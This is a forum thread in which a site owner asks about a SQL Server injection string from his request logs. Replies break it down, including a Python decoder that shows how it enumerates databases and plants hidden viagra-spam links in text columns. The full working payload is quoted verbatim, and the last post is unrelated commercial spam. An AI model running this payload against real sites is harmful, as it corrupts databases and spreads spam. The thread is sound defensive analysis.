Code Project
What / how are these people trying to hack my site?

    Wombaticus wrote (#1):

    Someone is (repeatedly) trying to hack a site I look after - unsuccessfully, I might add, as I do check and sanitize all requests - but I am interested in knowing how... they are requesting a page URL with the following appended:

    ';declare @b cursor;declare @s varchar(8000);declare @w varchar(99);set @b=cursor for select db_name() union select name from sys.databases where (has_dbaccess(name)!=0) and name not in ('master','tempdb','model','msdb',db_name());open @b;fetch next from @b into @w;while @@fetch_status=0 begin set @s='begin try use '+@w+';declare @c cursor;declare @d varchar(4000);set @c=cursor for select ''update [''+table_name+''] set [''+column_name+'']=[''+column_name+'']+case abs(checksum(newid()))%2510 when 0 then ''''''+char(60)+''div style="display:none"''+char(62)+''transfer prescription coupon ''+char(60)+''a href="http:''+char(47)+char(47)+''www.liberitutti.info''+char(47)+''page''+char(47)+''viagra-coupons-from-pfizer"''+char(62)+''''''+case abs(checksum(newid()))%253 when 0 then ''''liberitutti.info'''' when 1 then ''''liberitutti.info'''' else ''''2016 viagra coupon'''' end +''''''+char(60)+char(47)+''a''+char(62)+'' viagra coupons and discounts''+char(60)+char(47)+''div''+char(62)+'''''' else '''''''' end'' from sysindexes as i inner join sysobjects as o on i.id=o.id inner join information_schema.columns on o.name=table_name where(indid in (0,1)) and data_type like ''%25varchar'' and(character_maximum_length in (2147483647,-1));open @c;fetch next from @c into @d;while @@fetch_status=0 begin exec (@d);fetch next from @c into @d;end;close @c end try begin catch end catch';exec (@s);fetch next from @b into @w;end;close @b--

    It looks to me as though they're hoping to inject some code into the page to either redirect users or at least display a link to their site - but how does this work? And what's the 'update table name checksum' stuff about? Just curious...

    "I'm never quite so stupid as when I'm being smart." - Linus van Pelt. "If you were as smart as you think you are, you wouldn't think you were so smart!" - Charlie Brown.

      DaveAuld wrote (#2):

      That looks like a T-SQL injection attempt. Looking at the content, they are trying to inject spam comments or something like that and are probably randomly trying sites hoping to find a vulnerable system, whether it be Joomla or WordPress or A. N. Other. I used to get this **** all the time when my website was up (Joomla v1.25 or whatever it was), and used to have to manually delete hundreds and thousands of comments waiting in moderation. The fact the ISP screwed an update and killed my virtual server probably did me a favour!

      Edit: First they set up some variables (declare), one of them a cursor (database positioning); next they search for and iterate all the databases defined in the system and then begin a process of simply adding content to the various columns. If you break the statement down into a readable structure, and then compare the keywords against the T-SQL specification, you will be able to work out what is going on. E.g. variables named with a single @ are user variables, and ones referenced by a double @@ are reserved by the database language for system variables, e.g. @@rowcount is used to report how many rows were updated/changed etc. following a command.

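      As an added worked example (not code from this thread or from either poster), here is a small Python decoder for the request suffix quoted in the first post. It does what DaveAuld suggests, breaking the statement into a readable structure, and answers the question about the checksum: it URL-decodes the suffix (%25 is an encoded %, so %2510 is really %10), then peels the two layers of doubled-quote escaping the way SQL Server's EXEC would, rendering the char(60)/char(62)/char(47) calls and keeping anything it cannot evaluate, such as @w, table_name and column_name, as a {placeholder}. The placeholder notation and all function names are this example's own; the payload constant is copied verbatim from the post, with backslash line continuations added so it fits on the page.

```python
"""Peel the layers of the T-SQL spam-injection payload quoted in the thread.

The request suffix is three statements deep: the URL-decoded text (layer 0)
builds a string @s that is EXEC'd once per database (layer 1); @s builds one
UPDATE per wide varchar column and EXECs each of those (layer 2). Every layer
doubles each single quote of the layer below, hence the wall of ''''.
"""
import re
import urllib.parse

# Copied verbatim from the forum post; the backslashes are Python line
# continuations and add nothing to the string.
RAW_PAYLOAD = """';declare @b cursor;declare @s varchar(8000);declare @w varchar(99);set @b=cursor for select db_name() union select name from sys.databases where (has_dbaccess(name)!=0) and name not in ('master','tempdb','model','msdb',db_name());\
open @b;fetch next from @b into @w;while @@fetch_status=0 begin set @s='begin try use '+@w+';declare @c cursor;declare @d varchar(4000);\
set @c=cursor for select ''update [''+table_name+''] set [''+column_name+'']=[''+column_name+'']+case abs(checksum(newid()))%2510 when 0 then ''''''+char(60)+''div style="display:none"''+char(62)+\
''transfer prescription coupon ''+char(60)+''a href="http:''+char(47)+char(47)+''www.liberitutti.info''+char(47)+''page''+char(47)+''viagra-coupons-from-pfizer"''+char(62)+\
''''''+case abs(checksum(newid()))%253 when 0 then ''''liberitutti.info'''' when 1 then ''''liberitutti.info'''' else ''''2016 viagra coupon'''' end +''''''+char(60)+char(47)+''a''+char(62)+\
'' viagra coupons and discounts''+char(60)+char(47)+''div''+char(62)+\
'''''' else '''''''' end'' from sysindexes as i inner join sysobjects as o on i.id=o.id inner join information_schema.columns on o.name=table_name where(indid in (0,1)) and data_type like ''%25varchar'' and(character_maximum_length in (2147483647,-1));\
open @c;fetch next from @c into @d;while @@fetch_status=0 begin exec (@d);fetch next from @c into @d;end;close @c end try begin catch end catch';exec (@s);fetch next from @b into @w;end;close @b--"""


def url_decode(raw: str) -> str:
    """Undo the URL encoding: %25 -> %, so %2510 is really %10."""
    return urllib.parse.unquote(raw)


def read_literal(text: str, i: int) -> tuple[str, int]:
    """Read the T-SQL literal starting at text[i] == "'"; '' inside it is one quote.

    Returns (unescaped content, index just past the closing quote).
    """
    if text[i] != "'":
        raise ValueError("not at a string literal")
    out, i = [], i + 1
    while i < len(text):
        if text[i] == "'":
            if text[i + 1:i + 2] == "'":
                out.append("'")
                i += 2
                continue
            return "".join(out), i + 1
        out.append(text[i])
        i += 1
    raise ValueError("unterminated string literal")


def find_top_level(text: str, needle: str, start: int = 0) -> int:
    """Index of the first `needle` outside string literals and parentheses, or -1."""
    depth, i = 0, start
    while i < len(text):
        if text[i] == "'":
            _, i = read_literal(text, i)
            continue
        if depth == 0 and text.startswith(needle, i):
            return i
        depth += (text[i] == "(") - (text[i] == ")")
        i += 1
    return -1


def split_concat(expr: str) -> list[str]:
    """Split a concatenation expression on its top-level '+' operators."""
    terms, start = [], 0
    while (i := find_top_level(expr, "+", start)) != -1:
        terms.append(expr[start:i].strip())
        start = i + 1
    terms.append(expr[start:].strip())
    return terms


CHAR_CALL = re.compile(r"char\((\d+)\)", re.IGNORECASE)


def render_concat(expr: str) -> str:
    """Evaluate '...'+char(N)+name concatenations the way SQL Server would.

    Literals are unescaped, char(N) becomes that character (this is how the
    payload spells < > / without sending them), and anything else, such as
    @w, table_name or column_name, is kept as a {placeholder}.
    """
    parts = []
    for term in split_concat(expr):
        if term.startswith("'"):
            value, end = read_literal(term, 0)
            if end != len(term):
                raise ValueError(f"unexpected text after literal: {term!r}")
            parts.append(value)
        elif (m := CHAR_CALL.fullmatch(term)):
            parts.append(chr(int(m.group(1))))
        else:
            parts.append("{" + term + "}")
    return "".join(parts)


def assigned_expr(stmt: str, var: str) -> str:
    """The expression in 'set <var>=<expr>;' (it ends at a top-level ';')."""
    key = f"set {var}="
    start = stmt.lower().find(key)
    if start == -1:
        raise ValueError(f"no assignment to {var}")
    start += len(key)
    end = find_top_level(stmt, ";", start)
    return stmt[start:end if end != -1 else len(stmt)]


def cursor_select_expr(stmt: str, var: str) -> str:
    """The select list of 'set <var>=cursor for select <expr> from ...'."""
    key = f"set {var}=cursor for select "
    start = stmt.lower().find(key)
    end = find_top_level(stmt, " from ", start + len(key)) if start != -1 else -1
    if end == -1:
        raise ValueError(f"no cursor assignment to {var}")
    return stmt[start + len(key):end]


def decode_layers(raw: str) -> dict[str, str]:
    """Return the injected text and the two nested layers it generates."""
    request = url_decode(raw)
    # The leading quote closes the application's own string literal and the
    # trailing -- comments out whatever the application appends afterwards.
    injected = request.removeprefix("'")
    per_database = render_concat(assigned_expr(injected, "@s"))
    per_column = render_concat(cursor_select_expr(per_database, "@c"))
    return {"injected": injected, "per_database": per_database, "per_column": per_column}


def statements(sql: str) -> list[str]:
    """Split one layer into its top-level statements so it can be read."""
    out, start = [], 0
    while True:
        i = find_top_level(sql, ";", start)
        piece = sql[start:i if i != -1 else len(sql)].strip()
        if piece:
            out.append(piece)
        if i == -1:
            return out
        start = i + 1


def spam_hit_rate(per_column_update: str) -> float:
    """Share of rows one pass tags: the CASE fires only when checksum(newid()) % N == 0."""
    m = re.search(r"abs\(checksum\(newid\(\)\)\)%(\d+) when 0", per_column_update)
    if m is None:
        raise ValueError("no checksum(newid()) % N when 0 pattern found")
    return 1 / int(m.group(1))


if __name__ == "__main__":
    layers = decode_layers(RAW_PAYLOAD)
    for name, sql in layers.items():
        print(f"--- {name} ---")
        for stmt in statements(sql):
            print("  " + stmt)
    print(f"fraction of rows tagged per pass: {spam_hit_rate(layers['per_column'])}")
```

      Running it prints the three layers statement by statement. The outermost layer enumerates every database the site's login can access other than master, tempdb, model and msdb. The middle layer, EXEC'd once per database, builds one UPDATE for each varchar/nvarchar column whose maximum length is -1 or 2147483647 (the varchar(max)-sized columns that usually hold page content), and the BEGIN TRY/CATCH swallows any error so one database failing does not stop the loop. The innermost layer, the generated UPDATE, appends a hidden div containing the spam link to roughly one row in ten (abs(checksum(newid())) % 10 = 0) and uses % 3 to pick the anchor text; every other row gets '' appended, i.e. is left as it was, which is why the statement touches every row yet only seeds a sprinkling of spam. Spelling <, > and / as char(60), char(62) and char(47) keeps those characters out of the request, presumably to slip past naive input filters. None of it works unless the site concatenates the URL parameter into a query that runs under a login with write access to those databases, which is the argument for parameterised queries over string sanitising.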
        Endive Software wrote (#3):

        Endive Software a leading PHP Web development company in USA. Hire PHP developer at affordable price. send your requirement : http://www.endivesoftware.com/get-a-quote.php Skype : endive-consulting Email : Sales@endivesoftware.com
